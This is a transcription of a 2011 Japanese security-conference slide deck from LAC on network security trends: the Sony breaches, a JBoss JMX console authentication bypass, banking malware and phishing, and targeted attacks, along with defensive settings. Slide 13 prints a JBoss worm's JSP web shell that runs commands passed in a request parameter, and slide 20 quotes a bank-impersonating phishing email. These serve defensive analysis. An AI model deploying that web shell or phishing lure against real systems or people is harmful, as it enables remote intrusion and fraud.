Microsoft PowerPoint - d4-川口洋-LAC_kawaguchi_IW2011 [互換モード]

Transcription

1 2011 年ネットワークセキュリティ最新動向 2011 年 12 月 2 日 川口 洋, CISSP 株式会社ラックチーフエバンジェリスト lac.co.jp

2 自己紹介 川口洋 ( かわぐちひろし ),CISSP 株式会社ラックチーフエバンジェリスト兼担当部長 ISOG-J 技術 WG リーダ 年ラック入社社内インフラシステムの維持 運用に従事する その他 セキュアサーバの構築サービスや サーバのセキュリティ検査業務なども行い 経験を積む その後 IDS や Firewall などの運用 管理業務を経て セキュリティアナリストとして JSOC 監視サービスに従事し 日々セキュリティインシデントに対応 2005 年より アナリストリーダとして セキュリティイベントの分析とともに IDS/IPS に適用する JSOC オリジナルシグネチャ (JSIG) の作成 チューニングを実施し 監視サービスの技術面のコントロールを行う JSOC チーフエバンジェリストとして JSOC 全体の技術面をコントロール そしてセキュリティオペレーションに関する研究 IT インフラへのリスクに関する情報提供 啓発活動を行っている BlackHatJapan PacSec InternetWeek PASSJ などのテクニカルカンファレンスや情報セキュリティシンポジウムなどで講演し 安全な IT ネットワークの実現を目指して日夜奮闘中 2010 年 ~2011 年 セキュリティ & プログラミングキャンプの講師として未来ある若者の指導にあたる 川口洋のセキュリティ プライベート アイズ (@IT) 連載中 2

3 Little earth Corporation 株式会社ラック会社案内 情報セキュリティ技術で 社会基盤を支える企業 サイバーセキュリティ研究所 設立 1986 年 ( 昭和 61 年 )9 月 資本金 11 億 5,942 万円 会社概要 サイバー救急センター 事業継続と被害者保護を第一に事業復旧を支援 サイバー救急センター 世界レベルで脅威情報を収集し分析 / 提供する サイバーセキュリティ研究所 社会活動 社会活動 国際標準化活動への参加やセキュリティ連絡会の設立 事業内容セキュリティソリューションサービス サイバービジネスセンター セキュアクラウド セキュリティ診断 本社 東京都千代田区平河町 2 丁目 16 番 1 号平河町森タワー オフィスの IT 環境をまるごとアウトソーシング セキュリティ診断 脆弱性を発見し セキュリティリスクを可視化 名古屋オフィス 愛知県名古屋市中区丸の内 2 丁目 18 番 11 号 46KT ビル 4F セキュリティ監視 セキュリティコンサルティング セキュリティコンサルティング 子会社 関連企業 Cyber Security LAC Co., Ltd.( 韓国 ) LAC CHINA CORPORATION Co., Ltd.( 中国 ) 株式会社 IT プロフェッショナル グループ (ITPG) Japan Security Operation Center 24 時間 365 日のセキュリティ監視サービス セキュリティアカデミー セキュリティアカデミー 最適化されたセキュリティ対策の策定支援 実践的な情報セキュリティ教育 3

4 JSOC マネージド セキュリティ サービス ( MSS) 安全安心のネットワークの提供 狡猾化する悪意を持ったハッカーの攻撃から プロフェッショナルによるセキュリティ運用 監視がお客様をお守りし ビジネスを成功に導きます 4

5 今日のトピック 大規模な個人情報漏えい事件 ネットバンク不正アクセス 防衛産業を狙ったサイバー攻撃 5

6 今日のトピック 大規模な個人情報漏えい事件 ネットバンク不正アクセス 防衛産業を狙ったサイバー攻撃 6

7 Sony 事件の流れ Sony 製品に対する Jail Break 訴訟問題 Sony DDoS 攻撃事件 (4 月中旬 ) Sony PSN 侵入事件 (4 月下旬 ) Sony 子会社侵入事件 (5 月以降 ) 7

8 記者会見の内容 アプリケーションサーバ 既知の脆弱性 なぜ * 既知 * の脆弱性を 防げなかったのか? 発見できなかったのか? 8

9 アプリケーションサーバの問題 アップデートしにくい わかっていても手が打てない 診断項目に入っていない 脆弱性を発見できない IDS/IPS のシグネチャがない 攻撃を発見できない サイバー救急センターからの情報提供事例 Tomcat Struts JBoss 等 9

10 インシデント対応事例 1 出口対策で不審な通信を発見 2CEC と JSOC の連携 3JSIG で攻撃を可視化 1 攻撃者との通信 6JSIG で JBoss に対する攻撃発見 防御 2 被害状況調査 5JSIG を JSOC ユーザへ展開 3 攻撃手法情報 CVE を悪用した攻撃 4 セキュリティアナリストが JSIG を作成検知テスト 負荷試験を実施 10

11 JMX コンソール 11

12 JMX コンソールの設定 <security-constraint> <web-resource-collection> <web-resource-name>htmladaptor</web-resource-name> <description> An example security config that only allows users with the role JBossAdmin to access the HTML JMX console web application </description> <url-pattern>/*</url-pattern> <http-method>get</http-method> <http-method>post</http-method> </web-resource-collection> <auth-constraint> <role-name>jbossadmin</role-name> </auth-constraint> </security-constraint> GET と POST の場合のみアクセス制御が働く HEAD の場合 認証無しでアクセスが可能 12

13 JBoss ワームが作成するバックドア /zecmd/zecmd.jsp /idssvc/idssvc.jsp /iesvc/iesvc.jsp /wstats/wstats.jsp page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getparameter("commen% 74")!= null) { out.println("command: " + request.getparameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getoutputstream(); InputStream in = p.getinputstream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readline(); while ( disr!= null % 29 { out.println(disr); disr = dis.readline(); } } %> </pre> </BODY></HTML> 13

14 攻撃のターゲット セキュリティ診断手法 攻撃検知 防御 ウェブアプリケーション ( 自社開発のアプリ等 ) セキュリティ診断ツール + 手動によるセキュリティ診断 IDS/IPS/WAF ミドルウェアアプリケーションサーバ (Tomcat,Struts,JBoss 等 )? サーバアプリケーション (Apache,IIS 等 ) セキュリティ診断ツール IDS/IPS 14

15 今日のトピック 大規模な個人情報漏えい事件 ネットバンク不正アクセス 防衛産業を狙ったサイバー攻撃 15

16 ネットバンクを狙った攻撃 不審な電子メール 合言葉 第 2 暗証番号 16

17 ネットバンクのお金が盗まれる マルウェア 口座情報 個人ユーザ フィッシング ネットバンク ネットバンクの口座情報を盗む盗んだ口座情報に不正アクセスし お金を盗む 17

18 フィッシングサイト ( 詐欺サイト ) 有効期限や CVV を入力させる より引用 18

19 フィッシングサイト ( 詐欺サイト ) 乱数表を入力させる 19

20 マルウェア付きメール 差出人は銀行を騙る 差出人 :U.F.J 銀行 件名 : 三菱東京 UFJ 銀行より大切なお知らせです 三菱東京 UFJ 銀行ご利用のお客様へ三菱東京 UFJ 銀行のご利用ありがとうございます このお知らせは 三菱東京 UFJ 銀行をご利用のお客様に送信しております この度 三菱東京 UFJ 銀行のセキュリティーの向上に伴いまして 確認番号カードを再発行する事になりました 再発行手続きはこのメールと一緒に添付されている申し込みソフトに必要事項を記入し送信をしていただければ手続き完了となりますので 添付ソフトを右クリックし対象をファイルに保存を選択後 必要事項を記入し送信お願いします 再発行のカードは後日郵送で届きますので到着までは現在の確認番号カードをお使いください この手続きを怠ると今後のオンライン上での操作に支障をきたす恐れがありますので 一刻も素早いお手続きをお願いします 三菱東京 UFJ 銀行 添付ファイル :UFJ.exe 添付ファイルは削除されていない 20

21 感染したパソコンでネットバンクにアクセス アドレスバーが緑鍵アイコンがある一見 正常なサイト 本来必要のない情報を入力させて盗む 注 : 川口作成イメージ図 21

22 参考 : 感染していないパソコン 22

23 マルウェアによる情報流出 ZeuS/Zbot 2008 年 ~2009 年世界では話題に 2011 年春ソースコード流出 同時期日本の銀行でも注意喚起 23

24 窃取した個人情報を閲覧するための画面 24

25 ウイルス対策ソフトの検出をチェックする 25

26 新しいウイルスは発見が困難 ウイルスが発見できなかった場合に 被害を最小限に防ぐ対処が重要 26

27 JSOC ユーザのウイルス感染事故 A 社 B 社 C 社 D 社 JSOC のほぼ 100% のユーザがウイルス対策ソフトを導入している その環境で毎月数百件のウイルス感染事故が発生している 27

28 JSOC ユーザの検知実績 マルウェア検知傾向 (2011 年上半期 ) メーカシグネチャと JSIG の検知割合 ネットバンクを狙う SpyEye ウイルスが増加しつつある 感染防止の 入口対策 と感染発見の 出口対策 が必要 28

29 今日のトピック 大規模な個人情報漏えい事件 ネットバンク不正アクセス 防衛産業を狙ったサイバー攻撃 29

30 防衛産業を狙った攻撃 標的型攻撃 ウイルスに感染 30

31 標的型攻撃のメールの例 差出人 件名 本文などよく見慣れたメールが送られてくる 添付ファイルが削除されていない (= ウイルス対策ソフトを抜けている ) 31

32 標的型攻撃のメールの例 原発などの時事ネタ 再送 というキーワードで日常のやりとりを装う 32

33 標的型攻撃のメールの例 33

34 標的型攻撃のメールの例 悪性サイトへのリンクが記載された HTML メールが届く 34

35 サイバー救急センターの対応実績 年々 緊急対応件数が増加しているサイバースパイ型の事案も増加中 35

36 標的型攻撃の流れ ( 一般的な話 ) ネットワーク パソコン 人 Firewall Proxy メールなので素通し 通常使うメールなので検知できず アンチウイルス スパムフィルター 標的型なので検知できず 適切な管理が出来てない アンチウイルス パッチ管理 クリックしたことなど覚えていない リテラシー プロクシからなので素通し 標的型なので検知できず パーソナルファイアーウォール 一般的には使いこなせず無効化される 36

37 巧妙なメール : ラックの分析 官公庁 間企業 IR 情報 社内連絡 グループ会社連絡 取引先連絡 時事ニュース 世間のニュースに敏感 組織に関わる情報 37

38 添付されるファイルの種類 パソコンのソフトウェアの脆弱性 ( 欠陥 ) を悪用 Windows に加え Adobe Reader Flash Player など 38

39 手口 ファイル名偽装 より ファイル名の向きを操作することが可能 (RLO) 39

40 インシデント対応事例 7 攻撃者への通信 8JSIG で発見 防御 6JSIG を JSOC ユーザへ展開 攻撃者のネットワーク 5 セキュリティアナリストが JSIG を作成検知テスト 負荷試験を実施 4 マルウェア解析結果を提供 1 緊急対応事案マルウェア検体を抽出 2 一般公開されないインシデント情報 3 マルウェア検体を提供 RRICS Risk Research Institute of Cyber Space 40

41 標的型攻撃の対策ポイント Firewall ネットワーク Proxy パソコン 人 メールなので素通し 通常使うメールなので検知できず アンチウイルス スパムフィルター 標的型なので検知できず 適切な管理が出来てない アンチウイルス パッチ管理 クリックしたことなど覚えていない リテラシー プロクシからなので素通し 標的型なので検知できず パーソナルファイアーウォール 一般的には使いこなせず無効化される ログ解析ネットワークフォレンジック FW/ プロキシで不審 IP アドレス Block IDS/IPS による監視防御 リテラシ向上教育疑似体験訓練 41

42 共通対策 :Adobe Reader 設定 Acrobat JavaScript を無効化 JavaScript を OFF 42

43 共通対策 :Adobe Reader 設定 外部アプリケーションの起動をさせない 外部アプリケーションで PDF 以外の添付ファイルを開くことを許可 を OFF 43

44 共通対策 :RLO 対策 ローカルセキュリティ設定 ソフトウェアの制限ポリシー 追加の規則 ** を指定し * と * の間に RLO を指定する 44

45 敵の狙いを理解する 攻撃側 ユーザ側 正面からは自動的 網羅的に攻撃 並行して裏側へ標的型攻撃 45

46 まとめ 敵の狙いを理解する ( 狙われているところはどこか? 弱いところはどこか?) 自分のシステムについて把握する ( できることとできないこと ) 守る方にも戦略が必要 ( モノが同じならヒトとジョウホウで差がでる ) 46

47 ありがとうございました ネット犯罪の多くは 気づかなかったのではなく 見えなかったのです 47 株式会社ラック